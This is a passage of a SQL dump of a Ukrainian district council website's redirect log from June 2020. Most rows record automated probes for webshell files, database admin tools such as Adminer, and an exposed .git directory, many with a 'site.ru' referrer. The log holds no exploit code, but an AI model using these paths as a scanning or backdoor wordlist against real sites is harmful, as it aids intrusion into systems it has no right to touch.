00:00:00',301),(34831,'https://www.malyn-rayrada.gov.ua/index.php/1798-sogodni-23-serpnya-v-ukrajini-vidznachaetsya-den-derzhavnogo-prapora',NULL,'','',2,0,'2020-06-12 00:21:42','0000-00-00 00:00:00',301),(34832,'https://malyn-rayrada.gov.ua/wp1/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/wp1/wp-login.php','',1,0,'2020-06-12 02:29:09','0000-00-00 00:00:00',301),(34833,'https://malyn-rayrada.gov.ua/user/register/',NULL,'','',1,0,'2020-06-12 04:13:54','0000-00-00 00:00:00',301),(34834,'https://malyn-rayrada.gov.ua/2020/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/2020/wp-login.php','',1,0,'2020-06-12 04:43:47','0000-00-00 00:00:00',301),(34835,'https://malyn-rayrada.gov.ua/adminer-4.7.3-en.php',NULL,'','',1,0,'2020-06-12 20:36:08','0000-00-00 00:00:00',301),(34836,'https://malyn-rayrada.gov.ua/2019/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/2019/wp-login.php','',1,0,'2020-06-12 23:18:17','0000-00-00 00:00:00',301),(34837,'https://malyn-rayrada.gov.ua/backup/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/backup/wp-login.php','',1,0,'2020-06-13 02:36:59','0000-00-00 00:00:00',301),(34838,'https://malyn-rayrada.gov.ua/sqlbuddy/login.php',NULL,'','',1,0,'2020-06-13 03:08:57','0000-00-00 00:00:00',301),(34839,'https://malyn-rayrada.gov.ua/adminer-4.7.4-en.php',NULL,'','',1,0,'2020-06-13 19:11:48','0000-00-00 00:00:00',301),(34840,'https://malyn-rayrada.gov.ua/login.php',NULL,'','',1,0,'2020-06-14 07:07:29','0000-00-00 00:00:00',301),(34841,'https://malyn-rayrada.gov.ua/adminer-4.7.5-en.php',NULL,'','',1,0,'2020-06-14 17:48:27','0000-00-00 00:00:00',301),(34842,'https://malyn-rayrada.gov.ua/network/content-post.php',NULL,'http://site.ru','',3,0,'2020-06-15 05:14:05','0000-00-00 00:00:00',301),(34843,'https://malyn-rayrada.gov.ua/test/blackhat.php',NULL,'http://site.ru','',2,0,'2020-06-15 06:34:51','0000-00-00 00:00:00',301),(34844,'https://malyn-rayrada.gov.ua/web/blackhat.php',NULL,'http://site.ru','',3,0,'2020-06-15 08:54:27','0000-00-00 00:00:00',301),(34845,'https://malyn-rayrada.gov.ua/web/content-post.php',NULL,'http://site.ru','',3,0,'2020-06-15 09:21:19','0000-00-00 00:00:00',301),(34846,'https://malyn-rayrada.gov.ua/sql/phpminiadmin.php?showcfg=1',NULL,'','',1,0,'2020-06-15 11:15:16','0000-00-00 00:00:00',301),(34847,'https://malyn-rayrada.gov.ua/_cache/blackhat.php',NULL,'http://site.ru','',3,0,'2020-06-15 13:41:56','0000-00-00 00:00:00',301),(34848,'https://malyn-rayrada.gov.ua/adminer-4.7.6-en.php',NULL,'','',1,0,'2020-06-15 16:13:16','0000-00-00 00:00:00',301),(34849,'https://malyn-rayrada.gov.ua/xixi.php',NULL,'http://site.ru','',1,0,'2020-06-15 17:56:15','0000-00-00 00:00:00',301),(34850,'https://malyn-rayrada.gov.ua/timco-aero.com/cache/blackhat.php',NULL,'http://site.ru','',2,0,'2020-06-15 17:56:53','0000-00-00 00:00:00',301),(34851,'https://malyn-rayrada.gov.ua/components/com_banners/helpers/theme.php',NULL,'http://site.ru','',3,0,'2020-06-15 19:39:18','0000-00-00 00:00:00',301),(34852,'https://malyn-rayrada.gov.ua/templates/protostar/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-15 19:42:45','0000-00-00 00:00:00',301),(34853,'https://malyn-rayrada.gov.ua/img.php',NULL,'http://site.ru','',2,0,'2020-06-15 20:12:56','0000-00-00 00:00:00',301),(34854,'https://malyn-rayrada.gov.ua/templates/protostar/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-15 20:31:17','0000-00-00 00:00:00',301),(34855,'https://malyn-rayrada.gov.ua/templates/beez3/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-15 21:02:13','0000-00-00 00:00:00',301),(34856,'https://malyn-rayrada.gov.ua/web/cache/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-15 21:25:02','0000-00-00 00:00:00',301),(34857,'https://malyn-rayrada.gov.ua/cache/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-15 22:19:26','0000-00-00 00:00:00',301),(34858,'https://malyn-rayrada.gov.ua/prov/blackhat.php',NULL,'http://site.ru','',2,0,'2020-06-15 22:43:02','0000-00-00 00:00:00',301),(34859,'https://malyn-rayrada.gov.ua/web/cache/blackhat.php',NULL,'http://site.ru','',2,0,'2020-06-15 22:44:06','0000-00-00 00:00:00',301),(34860,'https://malyn-rayrada.gov.ua/feal.php',NULL,'http://site.ru','',2,0,'2020-06-16 04:39:39','0000-00-00 00:00:00',301),(34861,'https://malyn-rayrada.gov.ua/cache/wp-console.php',NULL,'http://site.ru','',3,0,'2020-06-16 06:41:55','0000-00-00 00:00:00',301),(34862,'https://malyn-rayrada.gov.ua/modules/mod_footer/tmpl/index.php',NULL,'http://site.ru','',1,0,'2020-06-16 08:44:12','0000-00-00 00:00:00',301),(34863,'https://malyn-rayrada.gov.ua/modules/mod_araticlws/mod_atlastic.php',NULL,'http://site.ru','',2,0,'2020-06-16 10:26:16','0000-00-00 00:00:00',301),(34864,'https://malyn-rayrada.gov.ua/includes/img/mode.php',NULL,'http://site.ru','',3,0,'2020-06-16 13:07:00','0000-00-00 00:00:00',301),(34865,'https://malyn-rayrada.gov.ua/r.php',NULL,'http://site.ru','',3,0,'2020-06-16 14:26:42','0000-00-00 00:00:00',301),(34866,'https://malyn-rayrada.gov.ua/templates/beez3/content-post.php',NULL,'http://site.ru','',4,0,'2020-06-16 14:34:11','0000-00-00 00:00:00',301),(34867,'https://malyn-rayrada.gov.ua/adminer-4.2.3-mysql.php',NULL,'','',1,0,'2020-06-16 14:37:56','0000-00-00 00:00:00',301),(34868,'https://malyn-rayrada.gov.ua/libraries/pear/archive_tar/mark.php',NULL,'http://site.ru','',5,0,'2020-06-16 15:07:31','0000-00-00 00:00:00',301),(34869,'https://malyn-rayrada.gov.ua/db/phpminiadmin.php?showcfg=1',NULL,'','',1,0,'2020-06-16 15:24:36','0000-00-00 00:00:00',301),(34870,'https://malyn-rayrada.gov.ua/components/com_config/controller/images.php',NULL,'http://site.ru','',1,0,'2020-06-16 16:20:32','0000-00-00 00:00:00',301),(34871,'https://malyn-rayrada.gov.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php',NULL,'http://site.ru','',4,0,'2020-06-16 18:49:08','0000-00-00 00:00:00',301),(34872,'https://malyn-rayrada.gov.ua/plugins/content/upgrade.php',NULL,'http://site.ru','',2,0,'2020-06-16 19:24:19','0000-00-00 00:00:00',301),(34873,'https://malyn-rayrada.gov.ua/components/com_content/controllers/images.php',NULL,'http://site.ru','',1,0,'2020-06-16 19:32:11','0000-00-00 00:00:00',301),(34874,'https://malyn-rayrada.gov.ua/system.php',NULL,'http://site.ru','',1,0,'2020-06-16 19:57:39','0000-00-00 00:00:00',301),(34875,'https://malyn-rayrada.gov.ua/dontme.php',NULL,'http://site.ru','',3,0,'2020-06-16 19:57:56','0000-00-00 00:00:00',301),(34876,'https://malyn-rayrada.gov.ua/wp-cofigs.php',NULL,'http://site.ru','',1,0,'2020-06-16 22:57:14','0000-00-00 00:00:00',301),(34877,'https://malyn-rayrada.gov.ua/libraries/joomla/template/tools.php',NULL,'http://site.ru','',3,0,'2020-06-16 23:30:10','0000-00-00 00:00:00',301),(34878,'https://malyn-rayrada.gov.ua/includes/404.php',NULL,'http://site.ru','',4,0,'2020-06-17 00:04:05','0000-00-00 00:00:00',301),(34879,'https://malyn-rayrada.gov.ua/index2.php',NULL,'http://site.ru','',3,0,'2020-06-17 00:33:29','0000-00-00 00:00:00',301),(34880,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.4/marvins.php',NULL,'http://site.ru','',4,0,'2020-06-17 00:35:29','0000-00-00 00:00:00',301),(34881,'https://malyn-rayrada.gov.ua/components/com_jooomlat/s.php',NULL,'http://site.ru','',2,0,'2020-06-17 01:13:47','0000-00-00 00:00:00',301),(34882,'https://malyn-rayrada.gov.ua/includes/d.php',NULL,'http://site.ru','',1,0,'2020-06-17 01:42:33','0000-00-00 00:00:00',301),(34883,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/r.php',NULL,'http://site.ru','',1,0,'2020-06-17 01:43:40','0000-00-00 00:00:00',301),(34884,'https://malyn-rayrada.gov.ua/media/bb.php',NULL,'http://site.ru','',3,0,'2020-06-17 02:18:58','0000-00-00 00:00:00',301),(34885,'https://malyn-rayrada.gov.ua/gallery.php',NULL,'http://site.ru','',4,0,'2020-06-17 02:22:48','0000-00-00 00:00:00',301),(34886,'https://malyn-rayrada.gov.ua/weblinks.php',NULL,'http://site.ru','',2,0,'2020-06-17 04:42:53','0000-00-00 00:00:00',301),(34887,'https://malyn-rayrada.gov.ua/do.php',NULL,'http://site.ru','',2,0,'2020-06-17 06:50:36','0000-00-00 00:00:00',301),(34888,'https://malyn-rayrada.gov.ua/libraries/pear/archive_tar/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-17 06:56:58','0000-00-00 00:00:00',301),(34889,'https://malyn-rayrada.gov.ua/__macosx/templates/beez3/html/com_weblinks/streamed.php',NULL,'http://site.ru','',1,0,'2020-06-17 06:57:00','0000-00-00 00:00:00',301),(34890,'https://malyn-rayrada.gov.ua/plugins/content/apismtp/vzadri.php',NULL,'http://site.ru','',3,0,'2020-06-17 07:30:09','0000-00-00 00:00:00',301),(34891,'https://malyn-rayrada.gov.ua/wp-content.php',NULL,'http://site.ru','',1,0,'2020-06-17 18:36:42','0000-00-00 00:00:00',301),(34892,'https://malyn-rayrada.gov.ua/libraries/joomla/document/feed/wso2.php',NULL,'http://site.ru','',1,0,'2020-06-17 18:38:08','0000-00-00 00:00:00',301),(34893,'https://www.malyn-rayrada.gov.ua/index.php/1799-sportfest-u-malinivtsi',NULL,'','',1,0,'2020-06-17 18:44:00','0000-00-00 00:00:00',301),(34894,'https://malyn-rayrada.gov.ua/sql/login.php',NULL,'','',1,0,'2020-06-17 19:11:28','0000-00-00 00:00:00',301),(34895,'https://malyn-rayrada.gov.ua/freshrdp.com2.php',NULL,'http://site.ru','',2,0,'2020-06-17 19:39:35','0000-00-00 00:00:00',301),(34896,'https://malyn-rayrada.gov.ua/images/stories/theme.php',NULL,'http://site.ru','',1,0,'2020-06-17 19:58:20','0000-00-00 00:00:00',301),(34897,'https://malyn-rayrada.gov.ua/components/wp-info.php',NULL,'http://site.ru','',2,0,'2020-06-17 20:11:51','0000-00-00 00:00:00',301),(34898,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/plugins/inlinepopups/css/admin-class.php',NULL,'http://site.ru','',1,0,'2020-06-17 20:48:30','0000-00-00 00:00:00',301),(34899,'https://malyn-rayrada.gov.ua/language/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-17 21:17:47','0000-00-00 00:00:00',301),(34900,'https://malyn-rayrada.gov.ua/libraries/joomla/base/content-ubh.php',NULL,'http://site.ru','',2,0,'2020-06-17 21:22:25','0000-00-00 00:00:00',301),(34901,'https://malyn-rayrada.gov.ua/modules/mod_acepolls/helper.php',NULL,'http://site.ru','',2,0,'2020-06-17 22:20:11','0000-00-00 00:00:00',301),(34902,'https://malyn-rayrada.gov.ua/modules/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-17 22:21:58','0000-00-00 00:00:00',301),(34903,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/btk.php',NULL,'http://site.ru','',1,0,'2020-06-17 22:57:00','0000-00-00 00:00:00',301),(34904,'https://malyn-rayrada.gov.ua/__macosx/templates/beez3/html/com_content/category/5e3045a6daeff.php',NULL,'http://site.ru','',3,0,'2020-06-17 22:59:17','0000-00-00 00:00:00',301),(34905,'https://malyn-rayrada.gov.ua/wp-models.php',NULL,'http://site.ru','',2,0,'2020-06-17 23:26:47','0000-00-00 00:00:00',301),(34906,'https://malyn-rayrada.gov.ua/images/banners/theme.php',NULL,'http://site.ru','',3,0,'2020-06-17 23:27:20','0000-00-00 00:00:00',301),(34907,'https://malyn-rayrada.gov.ua/alf.php',NULL,'http://site.ru','',2,0,'2020-06-17 23:28:06','0000-00-00 00:00:00',301),(34908,'https://malyn-rayrada.gov.ua/libraries/phputf8/native/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-17 23:54:21','0000-00-00 00:00:00',301),(34909,'https://malyn-rayrada.gov.ua/optionsa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-06-18 00:00:16','0000-00-00 00:00:00',301),(34910,'https://malyn-rayrada.gov.ua/um0six6/mini-shell.php',NULL,'http://site.ru','',1,0,'2020-06-18 00:03:56','0000-00-00 00:00:00',301),(34911,'https://malyn-rayrada.gov.ua/wp-blogs.php',NULL,'http://site.ru','',4,0,'2020-06-18 00:29:56','0000-00-00 00:00:00',301),(34912,'https://malyn-rayrada.gov.ua/modules/mod_fxprev/libraries/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-18 00:31:26','0000-00-00 00:00:00',301),(34913,'https://malyn-rayrada.gov.ua/framework.php',NULL,'http://site.ru','',1,0,'2020-06-18 01:46:01','0000-00-00 00:00:00',301),(34914,'https://malyn-rayrada.gov.ua/wp-seo.php',NULL,'http://site.ru','',2,0,'2020-06-18 02:02:27','0000-00-00 00:00:00',301),(34915,'https://malyn-rayrada.gov.ua/components/com_foxcontact/0byte.php',NULL,'http://site.ru','',2,0,'2020-06-18 02:03:07','0000-00-00 00:00:00',301),(34916,'https://malyn-rayrada.gov.ua/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-18 02:05:52','0000-00-00 00:00:00',301),(34917,'https://malyn-rayrada.gov.ua/cli/db2.php',NULL,'http://site.ru','',1,0,'2020-06-18 02:36:57','0000-00-00 00:00:00',301),(34918,'https://malyn-rayrada.gov.ua/fx.php',NULL,'http://site.ru','',2,0,'2020-06-18 03:06:31','0000-00-00 00:00:00',301),(34919,'https://malyn-rayrada.gov.ua/xmlrpc/system_infos.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:07:53','0000-00-00 00:00:00',301),(34920,'https://malyn-rayrada.gov.ua/.info.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:10:09','0000-00-00 00:00:00',301),(34921,'https://malyn-rayrada.gov.ua/sax.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:30:03','0000-00-00 00:00:00',301),(34922,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/wp-console.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:35:28','0000-00-00 00:00:00',301),(34923,'https://malyn-rayrada.gov.ua/templates/hotel/cnn.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:58:12','0000-00-00 00:00:00',301),(34924,'https://malyn-rayrada.gov.ua/plugins/system/legacy/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-18 06:08:05','0000-00-00 00:00:00',301),(34925,'https://malyn-rayrada.gov.ua/scriptsa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-18 06:31:54','0000-00-00 00:00:00',301),(34926,'https://malyn-rayrada.gov.ua/tmp/doc.php',NULL,'http://site.ru','',1,0,'2020-06-18 07:57:42','0000-00-00 00:00:00',301),(34927,'https://malyn-rayrada.gov.ua/media/mailto/0x.php',NULL,'http://site.ru','',1,0,'2020-06-18 07:58:29','0000-00-00 00:00:00',301),(34928,'https://malyn-rayrada.gov.ua/libraries/joomla/caches.php?ina',NULL,'http://site.ru','',1,0,'2020-06-18 08:25:21','0000-00-00 00:00:00',301),(34929,'https://malyn-rayrada.gov.ua/modules/mod_carramba/hours.php',NULL,'http://site.ru','',2,0,'2020-06-18 08:27:05','0000-00-00 00:00:00',301),(34930,'https://malyn-rayrada.gov.ua/css/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-18 08:53:06','0000-00-00 00:00:00',301),(34931,'https://malyn-rayrada.gov.ua/res.php',NULL,'http://site.ru','',3,0,'2020-06-18 10:17:55','0000-00-00 00:00:00',301),(34932,'https://malyn-rayrada.gov.ua/cli/donttouch.php',NULL,'http://site.ru','',2,0,'2020-06-18 10:41:54','0000-00-00 00:00:00',301),(34933,'https://malyn-rayrada.gov.ua/components/com_content/wso3.php',NULL,'http://site.ru','',2,0,'2020-06-19 06:03:11','0000-00-00 00:00:00',301),(34934,'https://malyn-rayrada.gov.ua/images/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 06:50:06','0000-00-00 00:00:00',301),(34935,'https://malyn-rayrada.gov.ua/components/com_banners/helpers/class.php',NULL,'http://site.ru','',1,0,'2020-06-19 08:58:57','0000-00-00 00:00:00',301),(34936,'https://malyn-rayrada.gov.ua/modules/logs.php',NULL,'http://site.ru','',3,0,'2020-06-19 10:00:33','0000-00-00 00:00:00',301),(34937,'https://malyn-rayrada.gov.ua/libraries/pear/archive_tar/content-post.php',NULL,'http://site.ru','',3,0,'2020-06-19 10:49:31','0000-00-00 00:00:00',301),(34938,'https://malyn-rayrada.gov.ua/layouts/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 11:35:41','0000-00-00 00:00:00',301),(34939,'https://malyn-rayrada.gov.ua/modules/mod_fxprev/libraries/wp-console.php',NULL,'http://site.ru','',3,0,'2020-06-19 12:02:26','0000-00-00 00:00:00',301),(34940,'https://malyn-rayrada.gov.ua/components/com_foxcontact/as.php',NULL,'http://site.ru','',1,0,'2020-06-19 12:06:32','0000-00-00 00:00:00',301),(34941,'https://malyn-rayrada.gov.ua/libraries/joomla/template/into.php',NULL,'http://site.ru','',1,0,'2020-06-19 12:06:45','0000-00-00 00:00:00',301),(34942,'https://malyn-rayrada.gov.ua/bl.php',NULL,'http://site.ru','',4,0,'2020-06-19 12:55:03','0000-00-00 00:00:00',301),(34943,'https://malyn-rayrada.gov.ua/images/headers/indeh.php',NULL,'http://site.ru','',1,0,'2020-06-19 12:56:47','0000-00-00 00:00:00',301),(34944,'https://malyn-rayrada.gov.ua/includes/dcomay.php',NULL,'http://site.ru','',1,0,'2020-06-19 12:58:50','0000-00-00 00:00:00',301),(34945,'https://malyn-rayrada.gov.ua/components/com_foxcontact/kd.php',NULL,'http://site.ru','',1,0,'2020-06-19 13:19:03','0000-00-00 00:00:00',301),(34946,'https://malyn-rayrada.gov.ua/includes/class.php',NULL,'http://site.ru','',1,0,'2020-06-19 13:20:30','0000-00-00 00:00:00',301),(34947,'https://malyn-rayrada.gov.ua/layouts/libraries/cms/alfav3.php',NULL,'http://site.ru','',1,0,'2020-06-19 13:21:21','0000-00-00 00:00:00',301),(34948,'https://malyn-rayrada.gov.ua/components/com_ajax/ajax.lib.php',NULL,'http://site.ru','',2,0,'2020-06-19 13:46:29','0000-00-00 00:00:00',301),(34949,'https://malyn-rayrada.gov.ua/qxonetrmsq.php',NULL,'http://site.ru','',1,0,'2020-06-19 14:49:43','0000-00-00 00:00:00',301),(34950,'https://malyn-rayrada.gov.ua/vz.php',NULL,'http://site.ru','',4,0,'2020-06-19 15:36:11','0000-00-00 00:00:00',301),(34951,'https://malyn-rayrada.gov.ua/templates/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 15:42:19','0000-00-00 00:00:00',301),(34952,'https://malyn-rayrada.gov.ua/cache/wp-info.php',NULL,'http://site.ru','',2,0,'2020-06-19 15:57:39','0000-00-00 00:00:00',301),(34953,'https://malyn-rayrada.gov.ua/webstat/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 16:03:10','0000-00-00 00:00:00',301),(34954,'https://malyn-rayrada.gov.ua/plugins/content/upgrade/upgrade.php',NULL,'http://site.ru','',3,0,'2020-06-19 16:25:52','0000-00-00 00:00:00',301),(34955,'https://malyn-rayrada.gov.ua/modules/mod_search/mide.php',NULL,'http://site.ru','',2,0,'2020-06-19 16:29:12','0000-00-00 00:00:00',301),(34956,'https://malyn-rayrada.gov.ua/xzeqaikkxu.php',NULL,'http://site.ru','',3,0,'2020-06-19 17:19:18','0000-00-00 00:00:00',301),(34957,'https://malyn-rayrada.gov.ua/libraries/phputf8/native/mark.php',NULL,'http://site.ru','',2,0,'2020-06-19 17:44:11','0000-00-00 00:00:00',301),(34958,'https://malyn-rayrada.gov.ua/templates/beez3/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-19 18:35:59','0000-00-00 00:00:00',301),(34959,'https://malyn-rayrada.gov.ua/ciosans.php',NULL,'http://site.ru','',1,0,'2020-06-19 19:29:27','0000-00-00 00:00:00',301),(34960,'https://malyn-rayrada.gov.ua/_1_administrator/edit/wertr6.php',NULL,'http://site.ru','',1,0,'2020-06-19 20:44:48','0000-00-00 00:00:00',301),(34961,'https://www.malyn-rayrada.gov.ua/index.php/1787-informatsiya-shchodo-vnesenikh-zmin-do-rajonnogo-byudzhetu-na-2017-rik?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2020-06-19 21:00:14','0000-00-00 00:00:00',301),(34962,'https://malyn-rayrada.gov.ua/postnewa/popup-pomo.php',NULL,'http://site.ru','',17,0,'2020-06-20 00:01:59','0000-00-00 00:00:00',301),(34963,'https://malyn-rayrada.gov.ua/templates/atomic/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-06-20 00:05:01','0000-00-00 00:00:00',301),(34964,'https://malyn-rayrada.gov.ua/modules/mod_random_image/media-views-rtl.php',NULL,'http://site.ru','',14,0,'2020-06-20 00:54:15','0000-00-00 00:00:00',301),(34965,'https://malyn-rayrada.gov.ua/images/stories/ok.php',NULL,'http://site.ru','',1,0,'2020-06-20 03:11:00','0000-00-00 00:00:00',301),(34966,'https://malyn-rayrada.gov.ua/wp-admin/images/3index.php',NULL,'http://site.ru','',1,0,'2020-06-20 05:21:57','0000-00-00 00:00:00',301),(34967,'https://malyn-rayrada.gov.ua/libraries/joomla/template/ash.php',NULL,'http://site.ru','',2,0,'2020-06-20 07:16:45','0000-00-00 00:00:00',301),(34968,'https://malyn-rayrada.gov.ua/media/media/media.php',NULL,'http://site.ru','',1,0,'2020-06-20 08:10:29','0000-00-00 00:00:00',301),(34969,'https://malyn-rayrada.gov.ua/modules/mod_insider/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-06-20 09:04:59','0000-00-00 00:00:00',301),(34970,'https://malyn-rayrada.gov.ua/wp-uploads.php',NULL,'http://site.ru','',1,0,'2020-06-21 04:21:47','0000-00-00 00:00:00',301),(34971,'https://malyn-rayrada.gov.ua/parseopmla/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-06-21 05:46:44','0000-00-00 00:00:00',301),(34972,'https://malyn-rayrada.gov.ua/components/com_foxcontact/c_2018.php',NULL,'http://site.ru','',1,0,'2020-06-21 06:09:05','0000-00-00 00:00:00',301),(34973,'https://malyn-rayrada.gov.ua/tmp/joomla.php',NULL,'http://site.ru','',2,0,'2020-06-21 06:10:13','0000-00-00 00:00:00',301),(34974,'https://malyn-rayrada.gov.ua/modules/mod_fxprev/libraries/doc.php',NULL,'http://site.ru','',2,0,'2020-06-21 08:20:52','0000-00-00 00:00:00',301),(34975,'https://malyn-rayrada.gov.ua/sitemps.php',NULL,'http://site.ru','',3,0,'2020-06-21 08:50:08','0000-00-00 00:00:00',301),(34976,'https://malyn-rayrada.gov.ua/libraries/joomla/utilities/iterator.php',NULL,'http://site.ru','',2,0,'2020-06-21 09:40:23','0000-00-00 00:00:00',301),(34977,'https://malyn-rayrada.gov.ua/media/media.php',NULL,'http://site.ru','',1,0,'2020-06-21 09:47:25','0000-00-00 00:00:00',301),(34978,'https://malyn-rayrada.gov.ua/bitrix/admin/search.php',NULL,'','',1,0,'2020-06-21 10:05:43','0000-00-00 00:00:00',301),(34979,'https://malyn-rayrada.gov.ua/wp-img.php',NULL,'http://site.ru','',2,0,'2020-06-21 10:59:57','0000-00-00 00:00:00',301),(34980,'https://malyn-rayrada.gov.ua/components/com_banners/models/images.php',NULL,'http://site.ru','',3,0,'2020-06-21 12:22:05','0000-00-00 00:00:00',301),(34981,'https://malyn-rayrada.gov.ua/shx.php',NULL,'http://site.ru','',5,0,'2020-06-21 12:24:39','0000-00-00 00:00:00',301),(34982,'https://malyn-rayrada.gov.ua/libraries/respectmuslims.php',NULL,'http://site.ru','',1,0,'2020-06-21 15:16:40','0000-00-00 00:00:00',301),(34983,'https://malyn-rayrada.gov.ua/plugins/djmediatools/djclassifieds/language/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-21 16:11:28','0000-00-00 00:00:00',301),(34984,'https://malyn-rayrada.gov.ua/nrw4vc.php',NULL,'http://site.ru','',1,0,'2020-06-21 16:16:27','0000-00-00 00:00:00',301),(34985,'https://malyn-rayrada.gov.ua/paypal/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-06-21 17:29:15','0000-00-00 00:00:00',301),(34986,'https://malyn-rayrada.gov.ua/modules/mod_jcomment/mod_jcomment.php',NULL,'http://site.ru','',1,0,'2020-06-21 17:29:17','0000-00-00 00:00:00',301),(34987,'https://malyn-rayrada.gov.ua/plugins/content/sdc/newsleter.php',NULL,'http://site.ru','',3,0,'2020-06-21 17:29:51','0000-00-00 00:00:00',301),(34988,'https://malyn-rayrada.gov.ua/mw.php',NULL,'http://site.ru','',1,0,'2020-06-21 17:42:43','0000-00-00 00:00:00',301),(34989,'https://malyn-rayrada.gov.ua/attachments/article/2406/ð ð¾ð²ñ‹ð¹ ð´ð¾ðºñƒð¼ðµð½ñ‚.pdf',NULL,'','',1,0,'2020-06-22 19:06:58','0000-00-00 00:00:00',301),(34990,'https://malyn-rayrada.gov.ua/telescope',NULL,'','',1,0,'2020-06-23 17:29:52','0000-00-00 00:00:00',301),(34991,'https://www.malyn-rayrada.gov.ua/telescope',NULL,'','',1,0,'2020-06-23 17:29:52','0000-00-00 00:00:00',301),(34992,'https://malyn-rayrada.gov.ua/ithz4xzbhtqmsiyjra/dols7mnmmdlztmcdi/e2umdkf5jiq/uz7yh9tgydle7bqjo9',NULL,'','',1,0,'2020-06-24 10:16:33','0000-00-00 00:00:00',301),(34993,'https://malyn-rayrada.gov.ua/c0nfig.php',NULL,'','',1,0,'2020-06-25 04:59:32','0000-00-00 00:00:00',301),(34994,'https://malyn-rayrada.gov.ua/adminer-4.6.3-mysql.php',NULL,'','',1,0,'2020-06-25 20:21:58','0000-00-00 00:00:00',301),(34995,'https://malyn-rayrada.gov.ua/adminer-4.7.0-mysql.php',NULL,'','',1,0,'2020-06-26 17:57:29','0000-00-00 00:00:00',301),(34996,'https://malyn-rayrada.gov.ua/.git/logs/head',NULL,'','',1,0,'2020-06-26 22:17:17','0000-00-00 00:00:00',301),(34997,'https://malyn-rayrada.gov.ua/pages/ex_liner.php',NULL,'http://site.ru','',3,0,'2020-06-27 05:43:37','0000-00-00 00:00:00',301),(34998,'https://malyn-rayrada.gov.ua/plugins/authentication/twatg.php',NULL,'http://site.ru','',1,0,'2020-06-27 05:45:51','0000-00-00 00:00:00',301),(34999,'https://malyn-rayrada.gov.ua/plugins/editors/codemirror/layouts/editors/codemirror/class.php',NULL,'http://site.ru','',2,0,'2020-06-27 06:51:58','0000-00-00 00:00:00',301),(35000,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/lux.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:21:24','0000-00-00 00:00:00',301),(35001,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/xun.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:36:33','0000-00-00 00:00:00',301),(35002,'https://malyn-rayrada.gov.ua/layouts/404.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:54:45','0000-00-00 00:00:00',301),(35003,'https://malyn-rayrada.gov.ua/mrspy.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:56:32','0000-00-00 00:00:00',301),(35004,'https://malyn-rayrada.gov.ua/oude/wp-content/themes/jasmijnbul/single-help.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:58:28','0000-00-00 00:00:00',301),(35005,'https://malyn-rayrada.gov.ua/plugins/djmediatools/sobipro/fields/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:29:16','0000-00-00 00:00:00',301),(35006,'https://malyn-rayrada.gov.ua/photo-album/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:37:24','0000-00-00 00:00:00',301),(35007,'https://malyn-rayrada.gov.ua/plugins/editors-xtd/xhmskkz.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:58:12','0000-00-00 00:00:00',301),(35008,'https://malyn-rayrada.gov.ua/modules/mod_articles_popular/media-views-rtl.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:58:22','0000-00-00 00:00:00',301),(35009,'https://malyn-rayrada.gov.ua/modules/mod_system/mod_system.php',NULL,'http://site.ru','',1,0,'2020-06-27 09:02:46','0000-00-00 00:00:00',301),(35010,'https://malyn-rayrada.gov.ua/modules/mod_fxprev/libraries/blackhat.php',NULL,'http://site.ru','',2,0,'2020-06-27 09:27:55','0000-00-00 00:00:00',301),(35011,'https://malyn-rayrada.gov.ua/adminer-4.7.1-mysql.php',NULL,'','',1,0,'2020-06-27 15:48:48','0000-00-00 00:00:00',301),(35012,'https://malyn-rayrada.gov.ua/language/en-gb/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-27 16:32:06','0000-00-00 00:00:00',301),(35013,'https://malyn-rayrada.gov.ua/modules/store.php',NULL,'http://site.ru','',2,0,'2020-06-27 16:43:47','0000-00-00 